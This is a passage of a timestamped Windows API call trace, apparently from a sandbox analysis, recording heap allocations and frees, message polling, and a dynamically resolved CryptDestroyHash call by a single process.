RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e508d8 [0175.172] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50830 [0175.172] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0175.172] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50998 [0175.172] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54440 [0175.172] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0175.172] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e508a8 [0175.172] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e506c8 [0175.172] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e506e0 [0175.172] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0175.172] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50710 [0175.172] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0175.172] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54440 | out: hHeap=0x970000) returned 1 [0175.172] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50728 [0175.172] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0175.172] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50788 [0175.172] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507a0 [0175.173] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0175.173] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e509e0 [0175.173] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50a10 [0175.173] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0175.173] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50b48 [0175.173] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e509c8 [0175.173] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0175.173] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0175.173] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0175.173] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fed8 [0175.173] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0175.173] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0175.173] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fed8 | out: hHeap=0x970000) returned 1 [0175.173] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0175.173] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50aa0 [0175.173] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0175.173] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0175.173] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0175.173] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0175.173] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0175.173] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0175.173] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0175.174] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0175.174] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0175.174] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0175.174] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0175.174] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0175.174] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0175.174] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0175.174] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0175.174] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0175.174] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0175.174] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0175.174] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0175.174] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0175.174] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0175.174] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54288 [0175.174] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0175.174] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0175.175] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0175.175] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0175.175] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0175.175] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0175.175] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0175.175] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0175.175] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0175.175] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0175.175] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0175.175] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0175.175] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0175.175] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0175.175] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0175.175] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0175.175] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0175.175] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0175.175] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0175.175] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0175.175] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0175.176] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0175.176] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0175.176] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0175.176] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0175.176] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0175.176] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0175.176] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0175.176] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x11) returned 0x2e69a08 [0175.176] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2e69a08, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0175.176] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0175.176] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54238 [0175.176] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a08 | out: hHeap=0x970000) returned 1 [0175.176] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDestroyHash") returned 0x756ff0e0 [0175.176] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54238 | out: hHeap=0x970000) returned 1 [0175.176] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0175.176] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0175.176] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0175.177] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0175.177] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0175.177] CryptDestroyHash (hHash=0xa873d0) returned 1 [0175.177] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0175.177] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0175.177] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0175.177] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0175.177] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0175.177] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0175.177] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0175.177] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0175.177] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0175.177] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0175.177] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0175.177] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0175.177] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0175.177] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0175.177] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0175.177] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0175.177] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0175.177] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0175.177] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0175.177] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0175.178] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0175.178] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0175.178] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0175.178] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0175.178] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0175.178] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0175.178] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0175.178] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0175.178] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0175.178] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54288 | out: hHeap=0x970000) returned 1 [0175.178] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0175.178] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0175.178] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0175.178] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0175.178] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0175.178] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0175.178] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0175.178] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0175.178] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0175.178] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0175.178] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0175.178] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0175.178] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0175.179] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0175.179] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0175.179] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0175.179] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0175.179] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0175.179] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0175.179] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0175.179] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0175.179] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0175.179] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0175.179] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0175.179] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0175.179] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0175.179] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0175.179] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0175.179] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0175.179] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0175.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0175.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0175.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0175.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0175.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0175.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0175.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0175.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0175.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0175.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0175.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0175.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0175.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0175.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0175.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0175.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0175.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977b18 | out: hHeap=0x970000) returned 1 [0175.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0175.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0175.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0175.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0175.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0175.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0175.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54490 | out: hHeap=0x970000) returned 1 [0175.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0175.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0175.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0175.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0175.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0175.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0175.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699c8 | out: hHeap=0x970000) returned 1 [0175.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0175.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0175.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0175.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0175.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0175.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542b0 | out: hHeap=0x970000) returned 1 [0175.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0175.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0175.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0175.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54670 | out: hHeap=0x970000) returned 1 [0175.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0175.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54300 | out: hHeap=0x970000) returned 1 [0175.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0175.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540a8 | out: hHeap=0x970000) returned 1 [0175.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0175.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0175.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0175.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54378 | out: hHeap=0x970000) returned 1 [0175.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0175.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0175.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54648 | out: hHeap=0x970000) returned 1 [0175.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0175.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e545f8 | out: hHeap=0x970000) returned 1 [0175.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0175.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54468 | out: hHeap=0x970000) returned 1 [0175.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0175.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54698 | out: hHeap=0x970000) returned 1 [0175.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0175.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0175.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0175.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54418 | out: hHeap=0x970000) returned 1 [0175.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0175.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0175.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0175.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0175.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0175.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50530 | out: hHeap=0x970000) returned 1 [0175.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0175.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0175.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0175.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53bc0 | out: hHeap=0x970000) returned 1 [0175.299] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0175.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0175.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0175.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77b48 [0175.299] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0175.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77b48 | out: hHeap=0x970000) returned 1 [0175.299] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0175.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77588 | out: hHeap=0x970000) returned 1 [0175.299] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0175.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0175.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: 